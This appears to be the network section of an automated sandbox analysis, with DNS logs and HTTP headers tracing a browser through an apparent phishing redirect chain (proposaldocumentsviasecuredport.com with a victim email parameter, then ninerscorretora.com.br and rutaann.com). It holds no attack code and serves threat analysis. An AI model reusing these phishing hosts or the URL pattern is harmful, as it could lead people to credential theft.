                                                        Mar 25, 2025 21:29:18.935939074 CET53636351.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:19.322073936 CET53647541.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:22.430222034 CET5094653192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:22.430632114 CET5393453192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:22.532632113 CET53509461.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:22.533143997 CET53539341.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:23.271203041 CET6362853192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:23.274014950 CET6460053192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:23.385327101 CET53646001.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:23.395483017 CET53636281.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.111727953 CET6177553192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:24.111990929 CET5795253192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:24.216525078 CET53617751.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:24.217736959 CET53579521.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:25.778601885 CET53611751.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:26.018352032 CET5317253192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:26.018556118 CET6537153192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:26.139400959 CET53653711.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:26.219629049 CET53531721.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:30.806870937 CET5948953192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:30.807069063 CET5479453192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:31.062380075 CET53547941.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:31.083101034 CET53594891.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:32.105762959 CET6329153192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:32.106003046 CET6407253192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:32.211055040 CET53640721.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:32.211648941 CET53632911.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:33.221416950 CET6509753192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:33.221961021 CET5356053192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:33.325777054 CET53650971.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:33.325824976 CET53535601.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:34.411626101 CET5801653192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:34.411890984 CET6529953192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:34.516249895 CET53580161.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:34.517292976 CET53652991.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:36.490451097 CET53553961.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:45.167983055 CET5167953192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:45.168070078 CET5527353192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:45.293431997 CET53552731.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:45.295439005 CET53516791.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:52.519468069 CET4937553192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:52.519732952 CET5817153192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:52.632169962 CET53581711.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:52.642848015 CET53493751.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:54.834990978 CET53573631.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:55.595885038 CET53516781.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:55.831657887 CET6460753192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:55.832056999 CET5394153192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:55.930207968 CET53539411.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:55.972726107 CET53646071.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:57.035424948 CET5969053192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:57.035424948 CET5505553192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:29:57.135113001 CET53596901.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:29:57.135380030 CET53550551.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:30:17.754275084 CET53602581.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:30:18.067212105 CET53497731.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:30:20.855106115 CET53551531.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:30:23.764882088 CET138138192.168.2.4192.168.2.255
                                                        Mar 25, 2025 21:30:24.119831085 CET5385153192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:30:24.120049000 CET5955653192.168.2.41.1.1.1
                                                        Mar 25, 2025 21:30:24.224040985 CET53538511.1.1.1192.168.2.4
                                                        Mar 25, 2025 21:30:24.224932909 CET53595561.1.1.1192.168.2.4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Mar 25, 2025 21:29:22.430222034 CET192.168.2.41.1.1.10xa6dbStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:22.430632114 CET192.168.2.41.1.1.10xf377Standard query (0)www.google.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:23.271203041 CET192.168.2.41.1.1.10xb479Standard query (0)proposaldocumentsviasecuredport.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:23.274014950 CET192.168.2.41.1.1.10x24dfStandard query (0)proposaldocumentsviasecuredport.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:24.111727953 CET192.168.2.41.1.1.10x2f2dStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:24.111990929 CET192.168.2.41.1.1.10x76dStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:26.018352032 CET192.168.2.41.1.1.10x18efStandard query (0)proposaldocumentsviasecuredport.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:26.018556118 CET192.168.2.41.1.1.10xbfbbStandard query (0)proposaldocumentsviasecuredport.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:30.806870937 CET192.168.2.41.1.1.10x63cbStandard query (0)sso.ninerscorretora.com.brA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:30.807069063 CET192.168.2.41.1.1.10x25fStandard query (0)sso.ninerscorretora.com.br65IN (0x0001)false
                                                        Mar 25, 2025 21:29:32.105762959 CET192.168.2.41.1.1.10x152cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:32.106003046 CET192.168.2.41.1.1.10x1943Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:33.221416950 CET192.168.2.41.1.1.10xdd69Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:33.221961021 CET192.168.2.41.1.1.10x7a48Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:34.411626101 CET192.168.2.41.1.1.10x5c95Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:34.411890984 CET192.168.2.41.1.1.10xf4fcStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:45.167983055 CET192.168.2.41.1.1.10xe5fbStandard query (0)rutaann.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:45.168070078 CET192.168.2.41.1.1.10xb223Standard query (0)rutaann.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:52.519468069 CET192.168.2.41.1.1.10x35f7Standard query (0)rutaann.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:52.519732952 CET192.168.2.41.1.1.10xdfa1Standard query (0)rutaann.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.831657887 CET192.168.2.41.1.1.10xe563Standard query (0)dc.services.visualstudio.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.832056999 CET192.168.2.41.1.1.10x6092Standard query (0)dc.services.visualstudio.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.035424948 CET192.168.2.41.1.1.10x89e7Standard query (0)dc.services.visualstudio.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.035424948 CET192.168.2.41.1.1.10xd52aStandard query (0)dc.services.visualstudio.com65IN (0x0001)false
                                                        Mar 25, 2025 21:30:24.119831085 CET192.168.2.41.1.1.10xb425Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:30:24.120049000 CET192.168.2.41.1.1.10xd0c5Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Mar 25, 2025 21:29:22.532632113 CET1.1.1.1192.168.2.40xa6dbNo error (0)www.google.com142.250.80.100A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:22.533143997 CET1.1.1.1192.168.2.40xf377No error (0)www.google.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:23.385327101 CET1.1.1.1192.168.2.40x24dfNo error (0)proposaldocumentsviasecuredport.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:23.395483017 CET1.1.1.1192.168.2.40xb479No error (0)proposaldocumentsviasecuredport.com104.21.92.117A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:23.395483017 CET1.1.1.1192.168.2.40xb479No error (0)proposaldocumentsviasecuredport.com172.67.192.251A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:24.216525078 CET1.1.1.1192.168.2.40x2f2dNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:26.139400959 CET1.1.1.1192.168.2.40xbfbbNo error (0)proposaldocumentsviasecuredport.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:26.219629049 CET1.1.1.1192.168.2.40x18efNo error (0)proposaldocumentsviasecuredport.com172.67.192.251A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:26.219629049 CET1.1.1.1192.168.2.40x18efNo error (0)proposaldocumentsviasecuredport.com104.21.92.117A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:31.083101034 CET1.1.1.1192.168.2.40x63cbNo error (0)sso.ninerscorretora.com.br103.114.43.73A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:32.211055040 CET1.1.1.1192.168.2.40x1943No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:32.211648941 CET1.1.1.1192.168.2.40x152cNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:32.211648941 CET1.1.1.1192.168.2.40x152cNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:33.325777054 CET1.1.1.1192.168.2.40xdd69No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:33.325777054 CET1.1.1.1192.168.2.40xdd69No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:33.325824976 CET1.1.1.1192.168.2.40x7a48No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:34.516249895 CET1.1.1.1192.168.2.40x5c95No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:34.516249895 CET1.1.1.1192.168.2.40x5c95No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:34.517292976 CET1.1.1.1192.168.2.40xf4fcNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Mar 25, 2025 21:29:45.295439005 CET1.1.1.1192.168.2.40xe5fbNo error (0)rutaann.com103.114.43.73A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:47.148195028 CET1.1.1.1192.168.2.40x3333No error (0)csp-afd-prod.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:47.148195028 CET1.1.1.1192.168.2.40x3333No error (0)azurefd-t-prod.trafficmanager.netshed.dual-low.s-part-0010.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:47.148195028 CET1.1.1.1192.168.2.40x3333No error (0)shed.dual-low.s-part-0010.t-0009.t-msedge.nets-part-0010.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:47.148195028 CET1.1.1.1192.168.2.40x3333No error (0)s-part-0010.t-0009.t-msedge.net13.107.246.38A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:47.155376911 CET1.1.1.1192.168.2.40x8c33No error (0)csp-afd-prod.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:47.155376911 CET1.1.1.1192.168.2.40x8c33No error (0)azurefd-t-prod.trafficmanager.netshed.dual-low.s-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:52.642848015 CET1.1.1.1192.168.2.40x35f7No error (0)rutaann.com103.114.43.73A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:54.829781055 CET1.1.1.1192.168.2.40xc2faNo error (0)aijscdn1-g4ccc2ajgnahcpct.b02.azurefd.netshed.dual-low.s-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:54.831110001 CET1.1.1.1192.168.2.40x5937No error (0)aijscdn1-g4ccc2ajgnahcpct.b02.azurefd.netshed.dual-low.s-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:54.831110001 CET1.1.1.1192.168.2.40x5937No error (0)shed.dual-low.s-part-0012.t-0009.t-msedge.nets-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:54.831110001 CET1.1.1.1192.168.2.40x5937No error (0)s-part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.930207968 CET1.1.1.1192.168.2.40x6092No error (0)dc.services.visualstudio.comdc.applicationinsights.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.930207968 CET1.1.1.1192.168.2.40x6092No error (0)dc.applicationinsights.microsoft.comdc.applicationinsights.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.930207968 CET1.1.1.1192.168.2.40x6092No error (0)dc.applicationinsights.azure.comglobal.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.930207968 CET1.1.1.1192.168.2.40x6092No error (0)global.in.ai.monitor.azure.comglobal.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.930207968 CET1.1.1.1192.168.2.40x6092No error (0)global.in.ai.privatelink.monitor.azure.comdc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.930207968 CET1.1.1.1192.168.2.40x6092No error (0)dc.trafficmanager.neteastus-global.in.applicationinsights.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.930207968 CET1.1.1.1192.168.2.40x6092No error (0)eastus-global.in.applicationinsights.azure.comgig-ai-prod-eastus-global.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.930207968 CET1.1.1.1192.168.2.40x6092No error (0)gig-ai-prod-eastus-global.trafficmanager.netgig-ai-g-prod-eastus-10-app-v4-tag.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.972726107 CET1.1.1.1192.168.2.40xe563No error (0)dc.services.visualstudio.comdc.applicationinsights.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.972726107 CET1.1.1.1192.168.2.40xe563No error (0)dc.applicationinsights.microsoft.comdc.applicationinsights.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.972726107 CET1.1.1.1192.168.2.40xe563No error (0)dc.applicationinsights.azure.comglobal.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.972726107 CET1.1.1.1192.168.2.40xe563No error (0)global.in.ai.monitor.azure.comglobal.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.972726107 CET1.1.1.1192.168.2.40xe563No error (0)global.in.ai.privatelink.monitor.azure.comdc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.972726107 CET1.1.1.1192.168.2.40xe563No error (0)dc.trafficmanager.neteastus-global.in.applicationinsights.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.972726107 CET1.1.1.1192.168.2.40xe563No error (0)eastus-global.in.applicationinsights.azure.comgig-ai-prod-eastus-global.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.972726107 CET1.1.1.1192.168.2.40xe563No error (0)gig-ai-prod-eastus-global.trafficmanager.netgig-ai-g-prod-eastus-1-app-v4-tag.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:55.972726107 CET1.1.1.1192.168.2.40xe563No error (0)gig-ai-g-prod-eastus-1-app-v4-tag.eastus.cloudapp.azure.com52.179.73.57A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135113001 CET1.1.1.1192.168.2.40x89e7No error (0)dc.services.visualstudio.comdc.applicationinsights.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135113001 CET1.1.1.1192.168.2.40x89e7No error (0)dc.applicationinsights.microsoft.comdc.applicationinsights.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135113001 CET1.1.1.1192.168.2.40x89e7No error (0)dc.applicationinsights.azure.comglobal.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135113001 CET1.1.1.1192.168.2.40x89e7No error (0)global.in.ai.monitor.azure.comglobal.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135113001 CET1.1.1.1192.168.2.40x89e7No error (0)global.in.ai.privatelink.monitor.azure.comdc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135113001 CET1.1.1.1192.168.2.40x89e7No error (0)dc.trafficmanager.neteastus-global.in.applicationinsights.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135113001 CET1.1.1.1192.168.2.40x89e7No error (0)eastus-global.in.applicationinsights.azure.comgig-ai-prod-eastus-global.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135113001 CET1.1.1.1192.168.2.40x89e7No error (0)gig-ai-prod-eastus-global.trafficmanager.netgig-ai-g-prod-eastus-1-app-v4-tag.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135113001 CET1.1.1.1192.168.2.40x89e7No error (0)gig-ai-g-prod-eastus-1-app-v4-tag.eastus.cloudapp.azure.com52.179.73.57A (IP address)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135380030 CET1.1.1.1192.168.2.40xd52aNo error (0)dc.services.visualstudio.comdc.applicationinsights.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135380030 CET1.1.1.1192.168.2.40xd52aNo error (0)dc.applicationinsights.microsoft.comdc.applicationinsights.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135380030 CET1.1.1.1192.168.2.40xd52aNo error (0)dc.applicationinsights.azure.comglobal.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135380030 CET1.1.1.1192.168.2.40xd52aNo error (0)global.in.ai.monitor.azure.comglobal.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135380030 CET1.1.1.1192.168.2.40xd52aNo error (0)global.in.ai.privatelink.monitor.azure.comdc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135380030 CET1.1.1.1192.168.2.40xd52aNo error (0)dc.trafficmanager.neteastus-global.in.applicationinsights.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135380030 CET1.1.1.1192.168.2.40xd52aNo error (0)eastus-global.in.applicationinsights.azure.comgig-ai-prod-eastus-global.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:29:57.135380030 CET1.1.1.1192.168.2.40xd52aNo error (0)gig-ai-prod-eastus-global.trafficmanager.netgig-ai-g-prod-eastus-11-app-v4-tag.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                        Mar 25, 2025 21:30:24.224040985 CET1.1.1.1192.168.2.40xb425No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                        • proposaldocumentsviasecuredport.com
                                                          • sso.ninerscorretora.com.br
                                                            • challenges.cloudflare.com
                                                            • rutaann.com
                                                              • dc.services.visualstudio.com
                                                        • a.nel.cloudflare.com
                                                        • c.pki.goog
                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        0192.168.2.449744142.250.176.19580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 25, 2025 21:29:30.000437021 CET202OUTGET /r/gsr1.crl HTTP/1.1
                                                        Cache-Control: max-age = 3000
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                                        User-Agent: Microsoft-CryptoAPI/10.0
                                                        Host: c.pki.goog
                                                        Mar 25, 2025 21:29:30.096599102 CET222INHTTP/1.1 304 Not Modified
                                                        Date: Tue, 25 Mar 2025 20:23:27 GMT
                                                        Expires: Tue, 25 Mar 2025 21:13:27 GMT
                                                        Age: 363
                                                        Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                                                        Cache-Control: public, max-age=3000
                                                        Vary: Accept-Encoding
                                                        Mar 25, 2025 21:29:30.103205919 CET200OUTGET /r/r4.crl HTTP/1.1
                                                        Cache-Control: max-age = 3000
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                        User-Agent: Microsoft-CryptoAPI/10.0
                                                        Host: c.pki.goog
                                                        Mar 25, 2025 21:29:30.202554941 CET222INHTTP/1.1 304 Not Modified
                                                        Date: Tue, 25 Mar 2025 20:23:30 GMT
                                                        Expires: Tue, 25 Mar 2025 21:13:30 GMT
                                                        Age: 360
                                                        Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                        Cache-Control: public, max-age=3000
                                                        Vary: Accept-Encoding


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449726104.21.92.117443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:23 UTC724OUTGET /ZayUC/?email=john.smith%40microsoft.com HTTP/1.1
                                                        Host: proposaldocumentsviasecuredport.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:24 UTC1351INHTTP/1.1 503 Service Temporarily Unavailable
                                                        Date: Tue, 25 Mar 2025 20:29:24 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Set-Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; path=/; expires=Wed, 26-Mar-25 20:29:23 GMT; Max-Age=86400;
                                                        Set-Cookie: Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; path=/; expires=Wed, 26-Mar-25 20:29:23 GMT; Max-Age=86400;
                                                        Set-Cookie: HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; path=/; expires=Wed, 26-Mar-25 20:29:23 GMT; Max-Age=86400;
                                                        Set-Cookie: nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; path=/; expires=Wed, 26-Mar-25 20:29:23 GMT; Max-Age=86400;
                                                        X-Frame-Options: SAMEORIGIN
                                                        Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MdD2B%2FKtKxUf49Q%2BiEUqJPicetOC336V638UqNqvbhYY%2F1TExLbb8dagiaq8N61MpFdZX360bMTOn1ndi0QR3JziZyxEpymiRSgTx57%2Fl5pX8eC%2FLlioHYwsSYg6Qe%2Bum2P6sHQYqlxGhLcTWgmUl3BsYnOx7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        2025-03-25 20:29:24 UTC280INData Raw: 43 46 2d 52 41 59 3a 20 39 32 36 31 32 38 66 66 63 64 65 62 64 39 32 61 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 30 31 37 32 39 26 6d 69 6e 5f 72 74 74 3d 31 30 31 30 38 32 26 72 74 74 5f 76 61 72 3d 32 32 32 39 38 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 39 36 26 72 65 63 76 5f 62 79 74 65 73 3d 31 32 39 36 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 36 31 35 30 26 63 77 6e 64 3d 32 33 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 36 38 65 63 62 65 62
                                                        Data Ascii: CF-RAY: 926128ffcdebd92a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=101729&min_rtt=101082&rtt_var=22298&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2896&recv_bytes=1296&delivery_rate=36150&cwnd=232&unsent_bytes=0&cid=68ecbeb
